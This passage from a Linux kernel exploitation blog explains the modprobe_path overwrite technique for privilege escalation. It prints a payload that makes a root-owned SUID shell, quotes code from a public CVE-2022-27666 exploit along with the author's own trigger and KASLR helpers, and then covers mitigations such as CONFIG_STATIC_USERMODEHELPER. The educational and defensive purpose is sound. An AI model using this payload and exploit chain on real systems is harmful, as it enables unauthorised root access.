<li>As a result, if an attacker can control <code>modprobe_path</code> then they can control the binary being executed by the root process</li>
</ul>
<p>Wait, so we need to overwrite a kernel symbol? If we can already do that haven&rsquo;t we already won?! Valid questions! The kernel is vast and complex, as such so is kernel exploitation - there are many types of bugs and ways to achieve privilege escalation.</p>
<p>Similarly, the motivations and goals of attackers vary. As we&rsquo;re looking at LPEs, let&rsquo;s assume the goal here is to go from unprivileged user to having root access.</p>
<p><img src="https://sam4k.com/content/images/2022/06/image-5.png" alt=""></p>
<p>Take this (very) simplistic view where we have a kernel memory corruption vulnerability, such as a heap buffer overflow. Ideally, we&rsquo;re able to leverage this to gain a control flow hijacking primitive (CFHP), where we can influence the flow of kernel code execution; say we manage to use our overflow to corrupt a pointer[6] and go from there.</p>
<p>If we can use our CFHP to overwrite arbitrary kernel addresses, we can use the <code>modprobe_path</code> technique we&rsquo;ve talked about to make the final pivot from kernel code execution to having root access in userspace (which is much more usable lol).</p>
<p>How, you ask? Well, first things first, let&rsquo;s take a look at an example of a typical binary we can overwrite <code>modprobe_path</code> to point to:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="nf">system</span><span class="p">(</span><span class="s">&#34;cp /usr/bin/sh /tmp/sh&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">system</span><span class="p">(</span><span class="s">&#34;chown root:root /tmp/sh&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">system</span><span class="p">(</span><span class="s">&#34;chmod 4755 /tmp/sh&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>This payload copies the shell to <code>/tmp/sh</code>, sets the owner of <code>/tmp/sh</code> as root [4], and then gives it the SUID bit [6].</p>
<p>This bit means that regardless of who runs the file, it runs with the owner&rsquo;s permissions. In this instance, if a user runs <code>/tmp/sh</code> after this, they will get a root shell<a href="https://www.redhat.com/sysadmin/suid-sgid-sticky-bit">[7]</a>.</p>
<p>So, to wrap our pseudo case-study up, our overall exploit chain might look like this:</p>
<ol>
<li>Create a binary (e.g. <code>/tmp/trigger</code>) to trigger the execution of <code>modprobe_path</code> as root via the kernel&rsquo;s usermodehelper, by starting it with bytes <code>0xFFFFFFFF</code></li>
<li>Compile &amp; place the payload from the snippet above (e.g. <code>/tmp/pwn</code>)</li>
<li>Trigger our arbitrary address write (e.g. via some kernel mem corruption bug), using the AAW primitive to overwrite <code>modprobe_path</code> with our payload, <code>/tmp/pwn</code></li>
<li>Execute <code>/tmp/trigger</code>, which will cause the kernel to run <code>/tmp/pwn</code> (the new value of <code>modprobe_path</code>) as root</li>
<li>As an unprivileged user we can now get a root shell by running <code>/tmp/sh</code> which is now a SUID executable owned by root</li>
</ol>
<h4 id="actual-examples">Actual Examples</h4>
<p><img src="https://sam4k.com/content/images/2022/07/welcome_to_the_real_world.gif" alt=""></p>
<p>So we&rsquo;ve covered a hasty pseudo-case study of how an attacker might use this <code>modprobe_path</code> technique to escalate privileges via a kernel AAW. Below are a few recent real-world write-ups and examples of this technique put to use:</p>
<ol>
<li><a href="https://etenal.me/archives/1825">CVE-2022-27666: Exploit esp6 modules</a> in Linux kernel by <a href="https://twitter.com/ETenal7">@Etenal7</a></li>
<li><a href="https://www.willsroot.io/2022/01/cve-2022-0185.html">CVE-2022-0185 - Winning a $31337 Bounty after Pwning Ubuntu and Escaping Google&rsquo;s KCTF Containers</a> by <a href="https://twitter.com/cor_ctf">@cor_ctf</a></li>
<li><a href="https://lkmidas.github.io/posts/20210223-linux-kernel-pwn-modprobe/">Linux Kernel Exploitation Technique: Overwriting modprobe_path</a> by <a href="https://twitter.com/_lkmidas">@_lkmidas</a></li>
</ol>
<h5 id="cve-2022-27666-by-etenal7">CVE-2022-27666 by <a href="https://twitter.com/ETenal7">@Etenal7</a></h5>
<p>I&rsquo;ve actually retroactively added this section after finishing the post, figuring it can&rsquo;t hurt to explore some real-world <a href="https://github.com/plummm/CVE-2022-27666">exploit code</a> making use of this technique.</p>
<p>So using what we&rsquo;ve learnt so far, particularly from our pseudo-case study, let&rsquo;s see how <a href="https://twitter.com/ETenal7">@Etenal7</a> makes use of this technique in their exploit (repo <a href="https://github.com/plummm/CVE-2022-27666">here</a>).</p>
<p>To read more on the memory corruption side of things and how they get an AAW primitive to be able to overwrite <code>modprobe_path</code>, check out the awesome <a href="https://etenal.me/archives/1825">write-up</a>. The tl;dr is they exploit an 8-page heap overflow (CVE-2022-27666), do some neat heap feng shui with the page allocator and the slab allocator, to ultimately gain a KASLR leak and AAW primitive.</p>
<p>Diving in, first of all we can see a similar payload in the file <a href="https://github.com/plummm/CVE-2022-27666/blob/main/get_rooot.c"><code>get_rooot.c</code></a>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="nf">system</span><span class="p">(</span><span class="s">&#34;chown root:root /tmp/myshell&#34;</span><span class="p">);</span>       <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="nf">system</span><span class="p">(</span><span class="s">&#34;chmod 4755 /tmp/myshell&#34;</span><span class="p">);</span>            <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="nf">system</span><span class="p">(</span><span class="s">&#34;/usr/bin/touch /tmp/exploited&#34;</span><span class="p">);</span>      <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://github.com/plummm/CVE-2022-27666/blob/main/get_rooot.c">get_rooot.c</a></p>
<p>Besides creating a root owned [0] SUID [1] shell, they also create a marker file <code>/tmp/exploited</code> to easily check the payload has been run later [2].</p>
<p>Moving onto the core exploit logic, over in <a href="https://github.com/plummm/CVE-2022-27666/blob/main/poc.c"><code>poc.c</code></a>, we can see the setup of the invalid binary used to eventually trigger <code>modprobe_path</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="cp">#define PROC_MODPROBE_TRIGGER &#34;/tmp/modprobe_trigger&#34;
</span></span></span><span class="line"><span class="cl"><span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">modprobe_trigger</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">  <span class="nf">execve</span><span class="p">(</span><span class="n">PROC_MODPROBE_TRIGGER</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">modprobe_init</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">  <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="nf">open</span><span class="p">(</span><span class="n">PROC_MODPROBE_TRIGGER</span><span class="p">,</span> <span class="n">O_RDWR</span> <span class="o">|</span> <span class="n">O_CREAT</span><span class="p">);</span>      <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">  <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">  <span class="p">{</span>
</span></span><span class="line"><span class="cl">      <span class="nf">perror</span><span class="p">(</span><span class="s">&#34;trigger creation failed&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">      <span class="nf">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">  <span class="p">}</span>
</span></span><span class="line"><span class="cl">  <span class="kt">char</span> <span class="n">root</span><span class="p">[]</span> <span class="o">=</span> <span class="s">&#34;</span><span class="se">\xff\xff\xff\xff</span><span class="s">&#34;</span><span class="p">;</span>                            
</span></span><span class="line"><span class="cl">  <span class="nf">write</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">root</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">root</span><span class="p">));</span>                               <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">  <span class="nf">close</span><span class="p">(</span><span class="n">fd</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">  <span class="nf">chmod</span><span class="p">(</span><span class="n">PROC_MODPROBE_TRIGGER</span><span class="p">,</span> <span class="mo">0777</span><span class="p">);</span>                          <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://github.com/plummm/CVE-2022-27666/blob/main/poc.c">poc.c</a></p>
<p>We can see they programmatically create the <code>modprobe_path</code> trigger in <code>modprobe_init()</code>, creating an executable [2] at path <code>PROC_MODPROBE_TRIGGER</code> [0] which simply consists of an invalid 4 byte header, <code>&quot;\xff\xff\xff\xff&quot;</code> [1].</p>
<p>This can later be triggered via <code>modprobe_trigger()</code> to make the kernel execute the (hopefully overwritten) <code>modprobe_path</code>.</p>
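<p>If you want to build your own trigger, here&rsquo;s a slightly more defensive sketch of the same idea. This is my own variant, not code from the exploit repo: <code>create_trigger()</code> is a hypothetical name, it passes an explicit mode to <code>open()</code> (which <code>O_CREAT</code> expects), and it writes exactly four bytes. In the original, <code>sizeof(root)</code> also counts the string&rsquo;s terminating NUL, so five bytes are written; that is harmless, since only the first four are inspected.</p>

```c
#include <assert.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Hypothetical variant of modprobe_init(): create an executable file at
 * `path` containing only four non-printable bytes.
 * Returns 0 on success, -1 on error.
 */
int create_trigger(const char *path)
{
    static const unsigned char magic[4] = { 0xff, 0xff, 0xff, 0xff };
    int fd;

    assert(path != NULL);

    /* O_CREAT requires a mode argument; 0755 makes the file executable. */
    fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    if (fd < 0)
        return -1;

    if (write(fd, magic, sizeof(magic)) != (ssize_t)sizeof(magic)) {
        close(fd);
        return -1;
    }

    /* fchmod() so that the process umask cannot strip the execute bits. */
    if (fchmod(fd, 0755) < 0) {
        close(fd);
        return -1;
    }

    return close(fd);
}
```

<p>Calling <code>create_trigger("/tmp/trigger")</code> and then <code>execve()</code>-ing that path is the userspace half of the technique; nothing interesting happens unless <code>modprobe_path</code> has been changed.</p>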
<p>Below I&rsquo;ve highlighted the code responsible for performing the AAW, triggering the corrupted <code>modprobe_path</code> and finally popping the payload:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">char</span> <span class="o">*</span><span class="n">evil_str</span> <span class="o">=</span> <span class="s">&#34;/tmp/get_rooot</span><span class="se">\x00</span><span class="s">&#34;</span><span class="p">;</span> <span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="p">(</span><span class="n">from</span> <span class="n">fuse_evil</span><span class="p">.</span><span class="n">c</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">overwrite_modprobe</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">  <span class="kt">void</span> <span class="o">*</span><span class="n">modprobe_path</span> <span class="o">=</span> <span class="n">addr_modprobe_path</span> <span class="o">+</span> <span class="n">kaslr_offset</span><span class="p">;</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">  <span class="p">...</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="p">...</span>
</span></span><span class="line"><span class="cl">    <span class="nf">arb_write</span><span class="p">(</span><span class="n">modprobe_path</span><span class="o">-</span><span class="mi">8</span><span class="p">,</span> <span class="nf">strlen</span><span class="p">(</span><span class="n">evil_str</span><span class="p">),</span> <span class="p">...);</span>     <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="p">...</span>
</span></span><span class="line"><span class="cl">    <span class="nf">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">modprobe_trigger</span><span class="p">();</span>                                    <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="nf">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="nf">am_i_root</span><span class="p">())</span> <span class="p">{</span>                                     <span class="p">[</span><span class="mi">4</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">      <span class="p">...</span>                                                  <span class="p">[</span><span class="mi">5</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;[+] Not root, try again</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">  <span class="p">}</span>
</span></span><span class="line"><span class="cl">  <span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">am_i_root</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">  <span class="k">struct</span> <span class="n">stat</span> <span class="n">buffer</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">  <span class="kt">int</span> <span class="n">exist</span> <span class="o">=</span> <span class="nf">stat</span><span class="p">(</span><span class="s">&#34;/tmp/exploited&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">buffer</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">  <span class="k">if</span><span class="p">(</span><span class="n">exist</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">      <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">  <span class="k">else</span>  
</span></span><span class="line"><span class="cl">      <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://github.com/plummm/CVE-2022-27666/blob/main/poc.c">poc.c</a></p>
<p>First they use the leaked KASLR offset to work out the address of the <code>modprobe_path</code> kernel symbol [1]. Next, the AAW is triggered [2], overwriting the original value of <code>modprobe_path</code> with the path to the payload, <code>/tmp/get_rooot</code> [0].</p>
<p>Then, with <code>modprobe_path</code> hopefully overwritten, they call <code>modprobe_trigger()</code> [3] to execute the invalid binary so the kernel ultimately executes the new <code>modprobe_path</code>.</p>
<p>Finally <code>am_i_root()</code> is called [4] to check for success by looking for the marker file <code>/tmp/exploited</code>, which is created when the payload <code>/tmp/get_rooot</code> is run by <code>usermodehelper</code>. If it exists, we can pop a shell [5].</p>
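<p>The address calculation in step [1] is just pointer arithmetic, and can be sketched as below. The function names are hypothetical, and any concrete addresses you plug in will depend on the target kernel build; the only assumption is that KASLR shifts every symbol in the kernel image by the same slide.</p>

```c
#include <assert.h>
#include <stdint.h>

/*
 * Hypothetical helper: derive the KASLR slide from a leaked runtime
 * address of a symbol whose static (unslid) address is known.
 */
uint64_t kaslr_slide(uint64_t leaked_addr, uint64_t static_addr)
{
    assert(leaked_addr >= static_addr);
    return leaked_addr - static_addr;
}

/*
 * Hypothetical helper: apply the slide to another symbol's static
 * address, e.g. the static address of modprobe_path.
 */
uint64_t rebase(uint64_t static_addr, uint64_t slide)
{
    return static_addr + slide;
}
```

<p>This mirrors <code>addr_modprobe_path + kaslr_offset</code> in the exploit: the static address of <code>modprobe_path</code> comes from the target kernel&rsquo;s symbols, and the slide comes from the leak.</p>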
<h3 id="mitigations">Mitigations</h3>
<p>Now that we have an understanding of the technique, how it&rsquo;s used to facilitate LPE and some examples of real-world use cases &hellip; how do we mitigate it?</p>
<p><code>CONFIG_STATIC_USERMODEHELPER</code> was introduced in 4.11[8], back in 2017 by <a href="https://twitter.com/gregkh">Greg KH</a>[9], specifically to mitigate this kind of attack surface.</p>
<h4 id="one-helper-to-rule-them-all">One Helper to Rule Them All</h4>
<p><img src="https://sam4k.com/content/images/2022/07/gollum_scared.gif" alt=""></p>
<p>Looking at <code>call_modprobe()</code> earlier, the kernel specifies an executable path via <code>call_usermodehelper_setup(path, ...)</code> and then <code>call_usermodehelper_exec()</code> will execute the binary specified by <code>path</code>. What&rsquo;s relevant to us is that <code>modprobe_path</code> is passed to <code>call_usermodehelper_setup()</code> and we can change <code>modprobe_path</code>.</p>
<p>With this config enabled, regardless of the <code>path</code> passed to <code>call_usermodehelper_setup()</code>, the kernel will only directly execute a single usermode binary defined by <code>CONFIG_STATIC_USERMODEHELPER_PATH</code>[10]. This path is read-only, so can&rsquo;t be changed (without write protection bit flipping shenanigans[11]).</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">subprocess_info</span> <span class="o">*</span><span class="nf">call_usermodehelper_setup</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">path</span><span class="p">,</span> <span class="p">...)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">subprocess_info</span> <span class="o">*</span><span class="n">sub_info</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">...</span>
</span></span><span class="line"><span class="cl">    
</span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_STATIC_USERMODEHELPER
</span></span></span><span class="line"><span class="cl">	<span class="n">sub_info</span><span class="o">-&gt;</span><span class="n">path</span> <span class="o">=</span> <span class="n">CONFIG_STATIC_USERMODEHELPER_PATH</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="cp">#else
</span></span></span><span class="line"><span class="cl">	<span class="n">sub_info</span><span class="o">-&gt;</span><span class="n">path</span> <span class="o">=</span> <span class="n">path</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v5.18.5/source/kernel/umh.c#L358">kernel/umh.c</a> (v5.18.5)</p>
<p>It is then the task of the static executable defined by <code>CONFIG_STATIC_USERMODEHELPER_PATH</code> to call the appropriate usermode helper, e.g. <code>/usr/bin/modprobe</code>.</p>
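<p>To make that a bit more concrete, here&rsquo;s a minimal sketch of the decision such a static helper might make. It assumes the originally requested helper path arrives as <code>argv[0]</code> (as it does for <code>call_modprobe()</code>); the <code>resolve_helper()</code> name and the allowlist entries are hypothetical, purely for illustration:</p>

```c
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical allowlist: the only helpers this static binary will run.
 * The paths are illustrative; a real system would list whichever helpers
 * its kernel actually invokes.
 */
static const char *const allowed_helpers[] = {
    "/sbin/modprobe",
    "/sbin/poweroff",
};

/*
 * Return the allowlisted path matching the helper the kernel asked for
 * (assumed to arrive as argv[0]), or NULL if the request is refused.
 */
const char *resolve_helper(const char *requested)
{
    size_t count = sizeof(allowed_helpers) / sizeof(allowed_helpers[0]);

    if (requested == NULL)
        return NULL;

    for (size_t i = 0; i < count; i++) {
        if (strcmp(requested, allowed_helpers[i]) == 0)
            return allowed_helpers[i];
    }
    return NULL;
}
```

<p>A real helper would then <code>execv()</code> the returned constant (never the caller-supplied string), so an overwritten <code>modprobe_path</code> such as <code>/tmp/get_rooot</code> simply gets refused.</p>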
<p>Alternatively, <code>CONFIG_STATIC_USERMODEHELPER</code> can be enabled but <code>CONFIG_STATIC_USERMODEHELPER_PATH</code> can be set to <code>&quot;&quot;</code>, disabling all usermode helper programs entirely; completely mitigating the <code>modprobe_path</code> technique.</p>
<h4 id="so-were-all-good">So We&rsquo;re All Good?</h4>
<p><img src="https://sam4k.com/content/images/2022/07/whats_the_big_deal.gif" alt=""></p>
<p>Awesome, you mean this whole thing was patched back in 2017? EZ PZ, next technique pls. Not so fast! Despite being introduced into the kernel back in 4.11, it still hasn&rsquo;t made its way into the default configurations for many popular distributions.</p>
<p>As of writing, this includes the latest versions of Ubuntu, Fedora and EndeavourOS; I&rsquo;m sure there&rsquo;s many more but that&rsquo;s all I know off the top of my head.</p>
<p>You can check your system by searching your config, typically in <code>/boot/config...</code> or <code>/proc/config.gz</code>, for <code>CONFIG_STATIC_USERMODEHELPER</code>. Alternatively I heartily recommend <a href="https://twitter.com/a13xp0p0v">@a13xp0p0v</a>&rsquo;s <a href="https://github.com/a13xp0p0v/kconfig-hardened-check">kconfig-hardened-check</a>.</p>
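<p>If you&rsquo;d rather script the check, here&rsquo;s a rough sketch of the search in C. It assumes a plain-text config file (the copy under <code>/proc</code> is gzip-compressed, so it would need decompressing first), and <code>kconfig_option_set()</code> is just a name I&rsquo;ve made up for the example:</p>

```c
#include <stdio.h>
#include <string.h>

/*
 * Look up a Kconfig option in a plain-text kernel config file.
 * Returns 1 if the option is set (=y, =m or some value), 0 if it is
 * unset or absent, and -1 if the file could not be opened.
 */
int kconfig_option_set(const char *config_path, const char *option)
{
    char line[512];
    size_t len = strlen(option);
    int found = 0;
    FILE *fp = fopen(config_path, "r");

    if (fp == NULL)
        return -1;

    while (fgets(line, sizeof(line), fp) != NULL) {
        /*
         * Set options look like "CONFIG_FOO=y"; unset ones appear as
         * "# CONFIG_FOO is not set", so they never match here. Checking
         * for '=' also stops CONFIG_FOO matching CONFIG_FOO_PATH.
         */
        if (strncmp(line, option, len) == 0 && line[len] == '=') {
            found = 1;
            break;
        }
    }

    fclose(fp);
    return found;
}
```

<p>Note the check for <code>=</code> straight after the name: without it, a search for <code>CONFIG_STATIC_USERMODEHELPER</code> would also match <code>CONFIG_STATIC_USERMODEHELPER_PATH</code>.</p>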
<p>I don&rsquo;t mean to point fingers though, the Linux ecosystem is vast and complex, with many moving parts and users. I can imagine there&rsquo;s plenty of components that make assumptions about/rely on <code>usermodehelper</code>, making removing it outright (via not setting <code>CONFIG_STATIC_USERMODEHELPER_PATH</code>) difficult?</p>
<p>The alternative is to implement the single usermode helper in such a way as to securely carry out the same functionality for users of <code>usermodehelper</code> while still mitigating similar attack surfaces and not introducing new ones.</p>
<h4 id="alternatives">Alternatives</h4>
<p><code>CONFIG_STATIC_USERMODEHELPER</code> isn&rsquo;t the only way to mitigate this technique, but it is one of the more direct, having been designed with this attack surface in mind.</p>
<p>From the code analysis earlier, some of you will also have noticed the more heavy-handed approach of disabling <code>CONFIG_MODULES</code> entirely, making the <code>request_module()</code> code path unreachable and preventing any module loading for that matter - certainly an effective mitigation.</p>
<p>However, this approach suffers the same issue (though to a greater extent) as disabling <code>usermodehelper</code>, in that it&rsquo;s gonna remove a pretty integral feature that many aspects of modern distros for your average user have come to make use of.</p>
<p>That&rsquo;s not to say there isn&rsquo;t an argument for disabling autoloading, reducing a broader attack surface than <code>CONFIG_STATIC_USERMODEHELPER</code>; it all depends on use case.</p>
<hr>
<ol>
<li><a href="http://www.vishalchovatiya.com/program-gets-run-linux/">http://www.vishalchovatiya.com/program-gets-run-linux/</a></li>
<li>From the comment above <a href="https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/binfmts.h#L18"><code>struct linux_binprm</code></a> definition</li>
<li>e.g. <code>load_elf_binary()</code>, <code>load_script()</code></li>
<li><a href="https://cateee.net/lkddb/web-lkddb/MODULES.html">CONFIG_MODULES</a> enables loadable module support, without this we can&rsquo;t <code>modprobe</code> new modules into the kernel</li>
<li>I believe the intention behind this check is to avoid invoking <code>request_module()</code> for plain-text files (that haven&rsquo;t already been picked up by <code>binfmt_script</code> at this point), under the assumption other binary formats will have at least one non-printable byte.</li>
<li>If KASLR is present we also need an information leak, to know the address of kernel symbols, e.g. <code>modprobe_path</code>, in order to rewrite it</li>
<li><a href="https://www.redhat.com/sysadmin/suid-sgid-sticky-bit">https://www.redhat.com/sysadmin/suid-sgid-sticky-bit</a></li>
<li><a href="https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER.html">https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER.html</a></li>
<li><a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=64e90a8acb8590c2468c919f803652f081e3a4bf">https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=64e90a8acb8590c2468c919f803652f081e3a4bf</a></li>
<li><a href="https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER_PATH.html">https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER_PATH.html</a></li>
<li>Which while doable, shifts the requirements from arbitrary kernel address write to a very lenient ROP chain or some kernel shellcode execution</li>
</ol>
<h2 id="conclusion">Conclusion</h2>
<p><img src="https://sam4k.com/content/images/2022/07/i_think_our_work_here_is_done.gif" alt=""></p>
<p>Not gonna lie, I thought this series might be an opportunity for me to whack out some shorter &lt;1000 word posts, but alas. Regardless, hopefully I&rsquo;ve given you some useful insights into, and an understanding of, a popular technique used in kernel exploit development to achieve local privilege escalation on modern kernels.</p>
<p>Although an effective mitigation exists within the kernel, this doesn&rsquo;t protect anyone unless it&rsquo;s enabled in the kernel configuration. This technique is particularly popular among attackers, as it&rsquo;s a relatively low maintenance technique, requiring the offset for only one kernel symbol: <code>modprobe_path</code>. Of course, you still need an AAW primitive.</p>
<p>Going forward, there&rsquo;s plenty more content for me to dive into. If you have anything in particular you&rsquo;re eager for me to cover, feel free to <a href="https://twitter.com/sam4k1">@me</a>.</p>
<p>Some ideas include tackling the various aspects of heap feng shui, ROP chains and their various sub-strands, broader approaches to exploiting various bug types such as use-after-frees, overflows etc. The list goes on and on! But that&rsquo;s all for now.</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>LiKE: A Series on Linux Kernel Exploitation</title><description>Thought the Linternals series was hype? Get ready for the even SEO friendlier LiKE, a series on Linux kernel exploitation.</description><link>https://sam4k.com/like-a-series-on-linux-kernel-exploitation/</link><guid isPermaLink="false">6266f3bd1b5b6d052837bfe7</guid><category>linux</category><category>kernel</category><category>xdev</category><dc:creator>sam4k</dc:creator><pubDate>Mon, 04 Jul 2022 14:50:00 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/04/tired_computer.gif" medium="image"/><content:encoded><![CDATA[<p>So you thought the <a href="https://sam4k.com/linternals-introduction/">Linternals</a> series was hype? Get ready for the even SEO friendlier LiKE, a series on all things Linux kernel exploitation.</p>
<p>I just couldn&rsquo;t help myself, despite spending my work days doing kernel exploit development, I&rsquo;m just that keen that I want to also cover it on my personal blog.</p>
<p>Seriously though, I think it&rsquo;s an extremely interesting topic for us to cover and will tie in nicely with the kernel internals knowledge we pick up from the <a href="https://sam4k.com/linternals-introduction/">Linternals</a> series.</p>
<p>Highlighted well in P0&rsquo;s recent post <a href="https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html">&ldquo;The More You Know, The More You Know You Don’t Know&rdquo;</a>, I think there is value in sharing and educating industry on the methodology and techniques that are being used by attackers. Plus kernel stuff is just cool right?</p>
<p>In terms of actual content, there&rsquo;s lots of scope for topics we can cover, and I&rsquo;m happy to hear your thoughts and suggestions. I have a few different areas I&rsquo;d like to cover:</p>
<ul>
<li><strong>Kernel exploitation techniques</strong>: often times kernel exploitation techniques are covered as part of a broader post on exploiting a particular bug, so I want to spend some time putting the spotlight on specific techniques - talking about when, why and how they&rsquo;re used as well as covering existing, future or possible mitigations.</li>
<li>Perhaps also highlighting <strong>mitigations</strong>? Talking about existing or upcoming security mitigations and how they impact(ed) the kernel exploitation space</li>
<li><strong>Classic kernel writeups</strong>: whether CTFs or real world PoCs, I&rsquo;m happy to spend some time providing technical coverage/analysis of cool stuff if that content isn&rsquo;t already out there</li>
</ul>
<p>Feel free to fire any questions, suggestions or *gasp* corrections my way <a href="https://twitter.com/sam4k1">@sam4k</a>.</p>
<h2 id="contents">Contents</h2>
<p><del>Similar to the Linternals post, going forward I&rsquo;ll keep this up-to-date as a sort of table of content for published posts in the LiKE series.</del></p>
<p>I&rsquo;ve since moved the contents to a <a href="https://sam4k.com/kernel-exploitation/">standalone page</a>, which you can reach from the navigation bar at the top, to keep things a bit more organised!</p>
<p>exit(0);</p>
